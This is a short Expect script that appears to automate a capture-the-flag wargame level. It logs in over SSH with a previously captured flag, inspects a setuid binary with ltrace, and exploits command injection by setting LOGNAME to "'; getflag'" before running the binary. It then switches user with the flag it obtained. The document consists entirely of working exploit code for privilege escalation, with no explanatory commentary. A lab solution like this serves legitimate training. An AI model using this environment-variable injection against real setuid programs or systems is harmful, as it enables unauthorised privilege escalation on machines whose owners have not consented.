#!/usr/bin/expect

set ip [ lindex $argv 0 ]
set port [ lindex $argv 1 ]
set user [ lindex $argv 2 ]
set password [ exec cat "../../flag06/flag" ]

spawn ssh "$user\@$ip" "-p $port"

expect "password:" { send "$password\r" }

expect -re {\$ $}
	send "ls -aRl\r"
	send "ltrace ./level07\r"
	send "env | grep LOGNAME\r"
	send "export LOGNAME='; getflag'\r"
	send "./level07\r"
	send "su level08\r"

set flag [ exec cat ../flag ]

expect "Password:" { send "$flag\r" }

expect -re {\$ $}
	send "id\r"
	send "exit\r"
	send "exit\r"